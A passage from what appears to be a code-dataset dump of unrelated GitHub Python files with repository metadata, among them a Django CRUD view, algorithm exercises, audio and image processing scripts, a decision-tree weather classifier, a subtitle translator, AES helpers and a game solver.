'__main__':\n df = parse_data()\n df = add_codes(df)\n converting(df)\n","repo_name":"koffiehuis/Dataprocessing","sub_path":"Homework/Week_6/convertCSV2JSON.py","file_name":"convertCSV2JSON.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"2049052315","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom .forms import ActivitiesForm\nfrom .models import activities\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom CAJL.aplications.activities.signals import create_change_log\n\n\n# Create your views here.\n#Vista datatable actividades\n@login_required\ndef activities_list(request):\n activities_data = activities.objects.all()\n \n tipos_actividad = activities_data.values_list('tipo_actividad', flat=True).distinct()\n \n context = {\n 'activities_data': activities_data,\n 'tipos_actividad': tipos_actividad,\n }\n \n return render(request, 'activities/activities_list.html', context)\n\n#Vista modificar datos, trayendo los mismos\n@login_required\ndef detallesact(request, activities_id):\n activity = get_object_or_404(activities, id=activities_id)\n \n if request.method == 'POST':\n if 'editar' in request.POST:\n form = ActivitiesForm(request.POST, instance=activity)\n if form.is_valid():\n updated_activity = form.save(commit=False)\n updated_activity.user = request.user\n updated_activity.save()\n \n messages.success(request, 'Los datos de la actividad han sido actualizados.')\n return redirect('actividades')\n else:\n messages.error(request, 'Error al actualizar los datos de la actividad.')\n elif 'eliminar' in request.POST:\n \n deleted_activity = activity\n deleted_activity.user = request.user\n \n activity.delete()\n \n\n # create_change_log(sender=activities, instance=None, user=user, created=False, activity_id=activity_id)\n messages.success(request, 'La actividad ha sido eliminada.')\n return redirect('actividades')\n else:\n form = ActivitiesForm(instance=activity)\n \n return render(request, 'activities/detalles_actividades.html', {'form': form, 'activity': activity})\n\n#Vista Agregar una nueva actividad\n@login_required\ndef agregar_actividad(request):\n if request.method == 'POST':\n # Si se envió un formulario (POST), procesa los datos y guárdalos en la base de datos.\n form = ActivitiesForm(request.POST)\n if form.is_valid():\n actividad = form.save(commit=False) # Guarda la instancia sin hacer commit\n actividad.user = request.user # Asigna el usuario actual\n\n try:\n actividad.save() # Ahora puedes guardar la instancia con el usuario asignado\n\n return redirect('actividades') # Redirige a la página de lista de actividades (ajusta la URL según tu configuración)\n except Exception as e:\n messages.error(request, f'Error al crear la actividad: {e}')\n else:\n # Si no se envió un formulario (GET), muestra el formulario para agregar una actividad.\n form = ActivitiesForm()\n\n return render(request, 'activities/agregar_actividad.html', {'form': form})","repo_name":"OmarFranciscoAcosta/Club-Atletico-Juventud-De-Liniers","sub_path":"CAJL/aplications/activities/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3110,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"29810465448","text":"import collections\n\nN = int(input())\nrecords = [list(map(int, input().split())) for _ in range(N)]\ncountry_medal = collections.defaultdict(int)\n\nrecords.sort(key=lambda x: -x[2])\n\nmedal = 0\nfor country, student, score in records:\n if country_medal[country] < 2 and medal < 3:\n country_medal[country] += 1\n medal += 1\n print(country, student)\n","repo_name":"zoolake/pythonPS","sub_path":"boj/2535.py","file_name":"2535.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14680619716","text":"\n# Inverser une chaine \n\nch = 'Bonjour tout le monde'\ninverser_chaine_de_caratere = ''.join(reversed(ch))\nprint (f\" le pharse est la suivante : {inverser_chaine_de_caratere}\")\n\n# une ature facon de le faire \n\n# ch[::-1]\n\n\n# methode join() , chaîne_resultat = séparateur.join(séquence)\n'''\n`séparateur` est la chaîne de caractères que vous souhaitez insérer entre chaque élément de la séquence.\n`séquence` est la séquence dont vous voulez joindre les éléments. \nCela peut être une liste, un tuple, ou une autre séquence itérable contenant des chaînes de caractères.\n'''","repo_name":"Saif-ALI96/formtion-tech-IA-python","sub_path":"exercis_pratique_python/exercis19.py","file_name":"exercis19.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"34546113604","text":"class Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n row = len(matrix)\n col = len(matrix[0])\n sq = [[0 for _ in range(col)] for _ in range(row)]\n m = 0\n for i in range(row):\n for j in range(col):\n sq[i][j] = int(matrix[i][j])\n m = max(m, sq[i][j])\n\n\n for i in range(1, row):\n for j in range(1, col):\n if matrix[i][j] == \"1\" and matrix[i-1][j-1] ==\"1\" and matrix[i-1][j] ==\"1\" and matrix[i][j-1]==\"1\":\n sq[i][j] = min(sq[i-1][j-1], sq[i-1][j], sq[i][j-1]) + 1\n m = max(m, sq[i][j])\n return m*m \n \n \n \n ","repo_name":"therealharish/Problem-Solving","sub_path":"leetcode/221. Maximal Square.py","file_name":"221. Maximal Square.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12620803234","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 29 14:16:58 2022\n\n@author: micha\n\"\"\"\n\nimport scipy\nimport librosa\nfrom scipy.io import wavfile\nfrom scipy import signal\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nfrom scipy.io.wavfile import write\nfrom utils import *\nimport pdb\n\n# load wav files\nspeech, sr = librosa.load('clean.wav')\nadditive_noise, sr = librosa.load('noisy_white_3dB.wav')\n\n# create noise\nmean = 0\nstd = 1\nnum_samples = len(speech)\nadditive_noise = np.random.uniform(low=0.0, high=0.015, size=len(speech))\n\n# add together\nnoisy_sig = speech + additive_noise\n\n# TODO: remove\n# noisy_sig = noisy_sig[:1000]\nchannels = 16\nf1 = 250\nf2 = 8000\norder = 256\n\n# create channels\nchannels_sig = create_channels(channels, f1, f2, sr, order, noisy_sig)\nnoisy_envelope = env_detect(channels_sig)\n\n# remove zeros from beginning - maybe change the lpf delay\n# TODO: remove?\nnoisy_envelope = noisy_envelope[1000:, :]\n# transpose to fit equations from paper\nnoisy_envelope = np.transpose(noisy_envelope)\n\n# create noise envelope\nnoise_track_channels = create_channels(channels, f1, f2, sr, order, additive_noise)\nnoise_track_env = env_detect(noise_track_channels)\nnoise_track_env = noise_track_env[1000:, :]\nnoise_track_env = noise_track_env.transpose()\n\nx_after_weights = np.zeros([channels, np.size(noisy_envelope, 1)])\nweights = np.zeros([channels, np.size(noisy_envelope, 1)])\nxi_vals = np.zeros([channels, np.size(noisy_envelope, 1)])\ngamma_vals = np.zeros([channels, np.size(noisy_envelope, 1)])\n\nfor i in range(0, channels):\n # first iteration: l = 0\n prev_x = noisy_envelope[i, 0]\n prev_n = noise_track_env[i, 0]\n # TODO: ask about n:\n n = noise_track_env[i, 0]\n y = noisy_envelope[i, 0]\n xi, gamma = estimated_instantaneous_snr(prev_x, i, y, prev_n, n)\n g = weighing_function(xi)\n x = enhanced_signal_envelope(g, y)\n\n for l in range(1, np.size(noisy_envelope, 1)):\n # update iteration\n prev_x = x\n prev_n = n\n n = noise_track_env[i, l]\n y = noisy_envelope[i, l]\n xi, gamma = estimated_instantaneous_snr(prev_x, i, y, prev_n, n)\n\n g = weighing_function(xi)\n x = enhanced_signal_envelope(g, y)\n\n x_after_weights[i, l] = x\n\n # save values for testing\n weights[i, l] = g\n xi_vals[i, l] = xi\n gamma_vals[i, l] = gamma\n\nlpf_x = np.zeros([channels, np.size(x_after_weights, 1)])\n\nfor i in range(0, channels):\n lpf_x[i, :] = butterworth_filter(filter_freq=200,\n sr=sr,\n filter_order=6,\n filter_type='low',\n sig_to_filter=x_after_weights[i, :]\n )\n\"\"\"\"\"\nfrom scipy import fftpack\n\nx = x_after_weights.flatten()\n# x = noisy_sig\nf_s = 22050\nX = fftpack.fft(x)\nfreqs = fftpack.fftfreq(len(x)) * f_s\n\nfig, ax = plt.subplots()\n\nplt.plot(freqs, np.abs(X))\n\"\"\"\"\"\n# reconstruct to 1D array\n\nfinal_signal = np.sum(lpf_x, axis=0)\nplt.plot(final_signal)\nplt.show()\nscipy.io.wavfile.write('final signal.wav', sr, final_signal*3)\nscipy.io.wavfile.write('noisy signal.wav', sr, noisy_sig)\nscipy.io.wavfile.write('noisy envelope.wav', sr, noisy_envelope.flatten()*5)\nscipy.io.wavfile.write('x_after_weights.wav', sr, np.sum(x_after_weights,axis=0)*5)","repo_name":"michalevin25/SigmoidAttenuationVocoder","sub_path":"sigmoiv_v2.py","file_name":"sigmoiv_v2.py","file_ext":"py","file_size_in_byte":3357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43820676871","text":"import numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\ndef equalizeHistogram(image, max_hist_val = 200):\n '''\n Input: \n image: Grayscale input image\n max_hist_val: The maximum value of pixel intesity to be considered by histogram, to compensate for the domination of \n higher intensity value(white background)\n\n Output: The returned image's pixel distribution upto max_hist_val pixel is equalized \n '''\n hist, bins = np.histogram(image.flatten(), max_hist_val, [0,max_hist_val])\n\n cdf = hist.cumsum()\n cdf_normalized = cdf * float(hist.max()) / cdf.max()\n\n cdf_m = np.ma.masked_equal(cdf,0)\n cdf_m = (cdf_m - cdf_m.min())*max_hist_val/(cdf_m.max()-cdf_m.min())\n cdf = np.ma.filled(cdf_m,0).astype('uint8')\n\n white_ar = 255 * np.ones((256-max_hist_val,)) \n white_ar = white_ar.astype('uint8')\n\n cdf = np.append(cdf, white_ar)\n img_ret = cdf[image]\n # print(cdf)\n # print(cdf.shape)\n\n return img_ret\n\nif __name__ == '__main__':\n image_loc = 'images/Pulley_Ex2.png'\n img = cv2.imread(image_loc)\n median_blur = cv2.medianBlur(img, 11)\n gray_mb = cv2.cvtColor(median_blur, cv2.COLOR_BGR2GRAY)\n\n custom = equalizeHistogram(gray_mb)\n inbuilt = cv2.equalizeHist(gray_mb)\n\n cv2.imshow('Orig', gray_mb)\n cv2.imshow('Custom', custom)\n cv2.imshow('Inbuilt', inbuilt)\n cv2.waitKey(0)\n cv2.destroyAllWindows()","repo_name":"Piyush-Kumar-Behera/AtwoodSolver","sub_path":"histogram_equalization.py","file_name":"histogram_equalization.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11254665221","text":"from mlagents_envs.side_channel.side_channel import (\n SideChannel,\n IncomingMessage,\n OutgoingMessage,\n)\nimport uuid\n\nclass StatisticalSideChannel(SideChannel):\n def __init__(self):\n super().__init__(uuid.UUID(\"ad041eb0-4a51-451f-a363-bb3a1a5d47bc\"))\n self.agent_win_count = 0\n self.opponent_win_count = 0\n\n def on_message_received(self, msg: IncomingMessage):\n msg_list = msg.read_float32_list()\n self.agent_win_count = msg_list[0]\n self.opponent_win_count = msg_list[1]\n\n def send_string(self, data: str):\n msg = OutgoingMessage()\n msg.write_string(data)\n super().queue_message_to_send(msg)","repo_name":"sansansan-333/mlagents-DQN","sub_path":"statisticsSideChannel.py","file_name":"statisticsSideChannel.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24876655743","text":"__copyright__ = \"\"\"\nCopyright (C) 2022 Kaushik Kulkarni\n\"\"\"\n\n__license__ = \"\"\"\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\"\"\"\n\nimport ast\n\nfrom typing import Union, Optional, Mapping\n\nfrom pytato.array import Array, DictOfNamedArrays\nfrom pytato.target.python import JAXPythonTarget, BoundJAXPythonProgram\nfrom pytato.target.python.numpy_like import generate_numpy_like\n\n__doc__ = \"\"\"\n.. autofunction:: generate_jax\n\"\"\"\n\n\ndef generate_jax(expr: Union[Array, Mapping[str, Array], DictOfNamedArrays],\n *,\n target: Optional[JAXPythonTarget] = None,\n jit: bool = False,\n function_name: str = \"_pt_kernel\",\n show_code: bool = False,\n colorize_show_code: bool = True,\n ) -> BoundJAXPythonProgram:\n \"\"\"\n Returns a :class:`pytato.target.python.BoundJAXPythonProgram` for the array\n expressions in *expr*.\n\n :arg jit: If *True*, the generated function is decorated with\n :func:`jax.jit`.\n :arg function: Name of the entrypoint function in the generated code.\n :arg show_code: If *True*, the generated code is printed to ``stdout``.\n \"\"\"\n if target is None:\n target = JAXPythonTarget()\n\n extra_preambles = []\n decorators = []\n\n if jit:\n extra_preambles.append(ast.ImportFrom(module=\"jax\",\n names=[ast.alias(\n \"jit\",\n asname=\"_pt_jax_jit\")],\n level=0))\n decorators.append(\"_pt_jax_jit\")\n\n return generate_numpy_like(expr, target=target, # type: ignore[return-value]\n function_name=function_name,\n show_code=show_code,\n extra_preambles=tuple(extra_preambles),\n entrypoint_decorators=tuple(decorators),\n colorize_show_code=colorize_show_code)\n","repo_name":"inducer/pytato","sub_path":"pytato/target/python/jax.py","file_name":"jax.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"40465555638","text":"import numpy as np\nfrom sklearn.tree import DecisionTreeClassifier, export_graphviz\nimport pandas as pd\nimport subprocess\n\ndef visualize_tree(tree, feature_names):\n\n with open(\"visual.dot\", 'w') as f:\n export_graphviz(tree, out_file=f, feature_names=feature_names)\n try:\n subprocess.check_call([\"dot\", \"-Tpng\", \"visual.dot\", \"-o\", \"visual.png\"])\n except:\n exit(\"Failed to generate a visual graph\")\n\n\ndef get_weather_data():\n data = pd.read_csv(\"weather_data.csv\")\n # print(data.head())\n return data\n\n\ndef preprocess(data, target_column):\n \"\"\"returns cleaned dataframe and targets\"\"\"\n data_clean = data.copy()\n targets = data_clean[target_column].unique()\n map_str_to_int = {name: n for n, name in enumerate(targets)}\n data_clean[\"Target\"] = data_clean[target_column].replace(map_str_to_int)\n\n return (data_clean, targets)\n\ndef display_labels(targets):\n print(\"0 :\",targets[0])\n print(\"1 :\",targets[1])\n print(\"2 :\",targets[2])\n print(\"3 :\",targets[3])\n\ndef train_classifier(train_data, train_target):\n \"\"\"returns a new model that can be used to make predictions\"\"\"\n # create a decision tree classifier\n wclf = DecisionTreeClassifier(min_samples_split=20, random_state=99)\n # train it on the training data / train classifier\n wclf.fit(train_data, train_target)\n\n return wclf\n\ndef ml():\n # gather the data set\n data = get_weather_data()\n # print(data.head())\n\n # encode the weather description to an integer. \n pp_data, targets = preprocess(data, \"Weather Description\")\n\n # just for visualization\n print(\"\\n* targets *\\n\", targets, end=\"\\n\\n\")\n features = list(pp_data.columns[:5])\n print(\"* features *\\n\", features, end=\"\\n\\n\")\n print(\"=======preprocessed data=======\\n\")\n print(\"------------first five rows------------\")\n print(\"* pp_data.head()\", pp_data[[\"Target\", \"Weather Description\"]].head(), sep=\"\\n\", end=\"\\n\\n\")\n print(\"------------last five rows------------\")\n print(\"* pp_data.head()\", pp_data[[\"Target\", \"Weather Description\"]].tail(), sep=\"\\n\", end=\"\\n\\n\")\n \n \n p_target = pp_data[\"Target\"]\n p_features = pp_data[features]\n\n # taking some data out of the dataset for testing\n items = [6,132,431,32]\n test_target = p_target.loc[items]\n test_data = p_features.loc[items]\n\n display_labels(targets)\n\n print(\"---Test Data's Target Value---\")\n print(\"Row \",\"Target\")\n print(test_target)\n\n # preparing data for training by removing test data\n train_target = p_target.drop(items)\n train_data = p_features.drop(items)\n \n wclf = train_classifier(train_data, train_target)\n\n visualize_tree(wclf, features)\n prediction = wclf.predict(test_data)\n print(\"\\n---Actual Prediction---\")\n print(prediction)\n\n\nif __name__==\"__main__\":\n ml()","repo_name":"Joy57/Storm-Prediction-ML","sub_path":"pi_storm.py","file_name":"pi_storm.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27607226328","text":"from turtle import Turtle\nfrom random import choice, randint\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 0.1\nMOVE_INCREMENT = 0.2\n\n\nclass CarManager:\n def __init__(self):\n self.cars = []\n self.number_of_cars = 20\n self.speed = STARTING_MOVE_DISTANCE\n for _ in range(self.number_of_cars):\n self.create_car()\n\n def manage_cars(self):\n for car in self.cars:\n if car.xcor() < -300:\n self.cars.remove(car)\n car.hideturtle()\n del car\n self.create_car()\n\n def increase_cars(self):\n self.create_car()\n\n def increase_speed(self):\n self.speed += MOVE_INCREMENT\n\n def create_car(self):\n new_car = Turtle(\"square\")\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.penup()\n new_car.setheading(-90)\n new_car.color(choice(COLORS))\n new_car.goto(randint(300, 1000), randint(-250, 250))\n self.cars.append(new_car)\n\n def move_cars(self):\n for car in self.cars:\n car.forward(self.speed)\n","repo_name":"ahsan2882/100-days-of-python-pro","sub_path":"day-023-turtle-crossing/car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22387894832","text":"# pip 업그레이드하기 => /usr/bin/python3 -m pip install --upgrade pip\n# 구글 번역 API 다운로드 하기 => pip3 install google_trans_new\n# requests 패키지도 필요함\n# 구글 번역 라이브러리는 Python >=3.6 에서 동작함\n\n# 주의사항 : 캡션을 달때는 무조건 한줄로 작성하기 => 아니면 캡션 다운로드한 다음에 한줄로 변경하기\n\n# 파이썬 버전을 업그레이드하면 google_trans_new 를 인식 못할수 있음 => 커맨드창에서 파이썬 버전을 변경해줘야함 py -3.91 youtube-translator-caption.py\n# 파이썬 3.9.1에서는 모듈을 인식하지만 3.9.6에서는 인식하지 못함\n\n# json.decoder.JSONDecodeError: Extra data \n# C:\\Users\\이성용\\AppData\\Local\\Programs\\Python\\Python39\\Lib\\site-packages\\google_trans_new 폴더 내에 google_trans_new.py 151 행 코드 변경하기\n# (decoded_line + ']') 를 decoded_line 으로 변경하기\n# python youtube-translator-caption.py 로 실행하면 됨\n\nimport os\nfrom google_trans_new import google_translator # 문제가 좀 있음\n\n# directory_to_save_captions = '/home/sylee/dev/utility/youtube-translator/captions/' # 자막을 저장할 폴더 위치 => PC마다 변경해줘야 함\ndirectory_to_save_captions = 'C:\\youtube-translator\\\\captions\\\\'\n\n# 자막 파일들을 담을 폴더 생성하기\ndef createFolder(directory):\n try:\n if not os.path.exists(directory):\n os.makedirs(directory)\n except OSError:\n print ('Error: Creating directory. ' + directory)\n \ncreateFolder(directory_to_save_captions)\n\n\nfilename = 'captions.srt' # 유튜브 영상에서 다운받은 자막파일 이름\nsrc_lang = 'en'\ntgt_lang_array = ['en', 'zh-cn', 'zh-tw', 'hi', 'ru',\n 'ja', 'de', 'th', 'id', 'ms', 'vi', 'tl',\n 'fi', 'fr', 'pl', 'pt', 'es', 'tr', 'it',\n 'uk', 'da', 'no', 'nl', 'sv', 'he'\n ]\n\nlang_codes = {\n 'en' : '영어',\n 'zh-cn': '중국어(간체)',\n 'zh-tw' : '중국어(번체)',\n 'hi' : '힌디어',\n 'ru': '러시아어',\n 'ja' : \t'일본어',\n 'de': '독일어',\n 'th': '태국어',\n 'id' : '인도네시아어',\n 'ms': '말레이어',\n 'vi' : '베트남어',\n 'tl' : '필리핀어',\n 'fi' : '핀란드어',\n 'fr': '프랑스어',\n 'pl': '폴란드어',\n 'pt': '포르투칼어',\n 'es': '스페인어',\n 'tr': '터키어',\n 'it': '이탈리아어',\n 'uk': '우크라이나어',\n 'da' : \t'덴마크어',\n 'no': '노르웨이어',\n 'nl': '네덜란드어',\n 'sv': '스웨던어',\n 'he': '히브리어'\n}\n\ntranslator = google_translator() \n\ndef translate_and_save_into_file(filename, tgt_lang):\n # 파일 전체 읽어서 lines 배열에 저장하기\n f = open(filename, \"r\" , encoding='UTF8')\n lines = f.readlines()\n\n # 라인마다 순회하면서 한글이 있는 줄만 번역한 다음 lines 배열에 업데이트하기\n for i, line in enumerate(lines):\n if (i-2) % 4 == 0: \n # print(lines[i])\n translate_text = translator.translate(lines[i],lang_src=src_lang, lang_tgt=tgt_lang) \n print(translate_text)\n lines[i] = translate_text + \"\\n\" # 원래 다운로드한 자막파일에 자막마다 한줄 띄워쓰기가 있어서 반드시 \"\\n\" 있어야 함\n\n # 변경된 lines 배열을 다시 파일에 쓰기\n f = open(\"{}captions_{}.srt\".format(directory_to_save_captions, lang_codes[tgt_lang]), \"w\", encoding='UTF8')\n f.writelines(lines)\n f.close()\n\n# 번역할 언어 갯수만큼 순회하면서 번역하고 파일 저장함\nfor i in range(len(tgt_lang_array)):\n translate_and_save_into_file(filename, tgt_lang_array[i])\n print(\"---------------------------------------------------------------\")\n\n\n\n# google trans new 코드 ########################\n############### 변경할 언어 코드 ################\n# 영어 : en\n# 중국어(간체): zh-cn\n# 중국어(번체) : zh-tw\n# 힌디어 : hi\n# 러시아어: ru\n# 일본어 : \tja\n# 독일어: de\n# 태국어: th\n# 인도네시아어 : id\n# 말레이어: ms\n# 베트남어 : vi\n# 필리핀어 : tl\n# 핀란드어 : fi\n# 프랑스어: fr\n# 폴란드어: pl\n# 포르투칼어: pt\n# 스페인어: es\n# 터키어: tr\n# 이탈리아어: it\n# 우크라이나어: uk\n# 덴마크어 : \tda\n# 노르웨이어: no\n# 네덜란드어: nl\n# 스웨던어: sv\n# 히브리어: he\n############################################","repo_name":"sssssqew/youtube-translator-upgrade","sub_path":"youtube-translator-caption.py","file_name":"youtube-translator-caption.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"31546666956","text":"from os import rename\nimport copy as c\n\nfrom os import rename\nimport copy as c\n\nclass tr :\n def transport(n) :\n #n = \"2b\"\n res = []\n n = list(n)\n for i in n :\n\n if i.isalpha() : i = tr.str_int(i)\n else : i = int(i)\n\n temp = list(bin(i))\n temp.pop(0)\n temp.pop(0)\n temp = tr.FillUp0(\"\".join(temp))\n temp = tr.str_int(\"\".join(temp))\n\n res.append(temp) \n #print(\"tr transport temp :\",temp)\n return \"\".join(res)\n\n def list_chunk(lst, n):\n return [lst[i:i+n] for i in range(0, len(lst), n)]\n\n def retransport(s) :\n if type(s) == type([]) :\n s = \"\".join(s)\n #s = \"0001\"\n\n s = tr.list_chunk(list(tr.FillUp0(str(s))),4)\n #print(\"retransport s :\",s)\n r = []\n for j in range(len(s)) :\n t = 0\n for i in range(len(s[j])) :\n #print(\"len(s[j])-i-1 :\",len(s[j])-i-1)\n #print(\"(2**(len(s[j])-i-1)) :\",(2**(len(s[j])-i-1)))\n #print(\"(int(s[j][i])) :\",(int(s[j][i])))\n #print(\"t += :\",(2**(len(s[j])-i-1))*(int(s[j][i])))\n t += ((2**(len(s[j])-i-1))*(int(s[j][i])))\n #print(\"\\n\")\n r.append(str(tr.str_int(t)))\n #print(\"\\n\")\n \n\n return \"\".join(r)\n \n \n\n def str_int(s) :\n if s == \"a\" : return 10\n elif s == \"b\" : return 11\n elif s == \"c\" : return 12\n elif s == \"d\" : return 13\n elif s == \"e\" : return 14\n elif s == \"f\" : return 15\n elif s == \"A\" : return 10\n elif s == \"B\" : return 11\n elif s == \"C\" : return 12\n elif s == \"D\" : return 13\n elif s == \"E\" : return 14\n elif s == \"F\" : return 15\n elif s == \"10\" : return \"a\"\n elif s == \"11\" : return \"b\"\n elif s == \"12\" : return \"c\"\n elif s == \"13\" : return \"d\"\n elif s == \"14\" : return \"e\"\n elif s == \"15\" : return \"f\"\n elif s == 10 : return \"a\"\n elif s == 11 : return \"b\"\n elif s == 12 : return \"c\"\n elif s == 13 : return \"d\"\n elif s == 14 : return \"e\"\n elif s == 15 : return \"f\"\n else : return s\n\n def FillUp0(i,byte=4) :\n #i = 10\n i = list(i)\n while True :\n if len(i) < byte :\n i.insert(0,\"0\")\n else :\n break\n return \"\".join(i)\n\n def XorOnStr(s1,s2) :\n s1 = list(str(s1))\n s2 = list(str(s2))\n res = []\n for i in range((len(s1)+len(s2))//2) :\n if s1[i] == s2[i] : res.append(\"0\")\n else : res.append(\"1\")\n return \"\".join(res)\n\n def XOR_word(w1,w2) :\n #w1 = 8a\n #w2 = 09\n \n print(\"funs tr xor word w1 :\",w1)\n print(\"funs tr xor word w2 :\",w2)\n \n \nprint(tr.transport(\"2b\"))\n\n\n\n\n","repo_name":"ghdwpaks/AES","sub_path":"ENC/py/util/1dev_util_xor.py","file_name":"1dev_util_xor.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"40037140851","text":"import json\n\n\ndef solver(position):\n if game.hasSymmetry:\n position = game.Canonical(position)\n if position in value_dict.keys():\n return value_dict[position]\n else:\n assign_value(position)\n #return value_dict[position] -> Don't use this if I want to solve the game fully in one shot\n\ndef assign_value(position):\n if game.PrimitiveValue(position) != 'NOT_PRIMITIVE': \n # This position is primitive, so update value_dict and we are done\n value = (game.PrimitiveValue(position), 0)\n value_dict[position] = value\n add_analysis(value)\n else:\n children = set()\n child_values = {'WIN': [], 'LOSE': [], 'TIE': []}\n for move in game.GenerateMoves(position):\n child = game.DoMove(position, move)\n if game.hasSymmetry:\n child = game.Canonical(child)\n if child not in children:\n children.add(child)\n if child not in value_dict:\n assign_value(child)\n c_value = value_dict[child]\n child_values[c_value[0]].append(c_value[1])\n if 0 < len(child_values['LOSE']):\n # If there exists a losing child, we're in a winning position, and we are done\n # remoteness = minimum (remoteness of losing children) + 1\n remoteness = min(child_values['LOSE']) + 1\n value = ('WIN', remoteness)\n value_dict[position] = value\n add_analysis(value)\n elif 0 < len(child_values['TIE']):\n # If there is no losing child but exists a tieing child, we're in a tieing position\n # remoteness is calculated to terminate the game as quickly as possible\n remoteness = min(child_values['TIE']) + 1\n value = ('TIE', remoteness)\n value_dict[position] = value\n add_analysis(value)\n else:\n # If all children are winning, we're in a losing position\n remoteness = max(child_values['WIN']) + 1\n value = ('LOSE', remoteness)\n value_dict[position] = value\n add_analysis(value)\n\ndef add_analysis(value):\n val, remoteness = value[0], value[1]\n # if remoteness == 0:\n # primitive_states[val] += 1\n all_positions[val] += 1\n if remoteness in by_remoteness:\n by_remoteness[remoteness][val] += 1\n else:\n by_remoteness[remoteness] = {'WIN': 0, 'LOSE': 0, 'TIE': 0}\n by_remoteness[remoteness][val] += 1\n\n# How do I generalize this to any game? \n#for i in range(N, -1, -1):\n #print(f\"{i}: {solver(i)}\")\n\ndef main(game_obj, module_name):\n global game, value_dict\n game = game_obj\n starting_pos = game.startingPos\n saveRes = input('Export data when finished? (Y/N): ').capitalize()\n saveRes = True if saveRes == 'Y' else False\n print(f\"Solving game...\")\n\n # Used for game analysis\n global primitive_states, all_positions, by_remoteness\n # primitive_states = {'WIN': 0, 'LOSE': 0, 'TIE': 0}\n all_positions = {'WIN': 0, 'LOSE': 0, 'TIE': 0}\n by_remoteness = {}\n\n # key: position, value: a tuple, (one of 'WIN', 'TIE', or 'LOSE' | remoteness)\n value_dict = {}\n\n solver(game.startingPos)\n # print(f'Primitive States: {primitive_states}')\n print(f'Remoteness Analysis:')\n print(f'Initial position is {value_dict[0][0]} in {value_dict[0][1]}.')\n print('Remoteness, WIN, LOSE, TIE, TOTAL')\n for k in sorted([key for key, _ in by_remoteness.items()], reverse=True):\n w, l, t = by_remoteness[k]['WIN'], by_remoteness[k]['LOSE'], by_remoteness[k]['TIE']\n total = w + l + t\n print(f'{k}, {w}, {l}, {t}, {total}')\n print(f'All Position Values: {all_positions}, with total: {sum(all_positions.values())}')\n\n if saveRes:\n configs = {'Configs':{}}\n for attr_name in dir(game):\n if not callable(getattr(game, attr_name)) and not attr_name.startswith(\"__\"):\n attr_value = getattr(game, attr_name)\n configs['Configs'].update({attr_name:attr_value})\n value_dict.update(configs)\n with open(f'./results/{module_name}_solved.json', 'w') as json_file:\n json.dump(value_dict, json_file)\n return value_dict\n else:\n return value_dict","repo_name":"aentum/GamesCraftersHF","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":4295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1942829502","text":"import os\nimport os.path as osp\nimport argparse\nimport numpy as np \nimport json\nimport time\n \nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nimport torchvision.datasets as datasets\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm \n \nfrom coco_loader import coco_loader\nfrom torchvision import models \nfrom convcap import convcap\nfrom vggfeats import 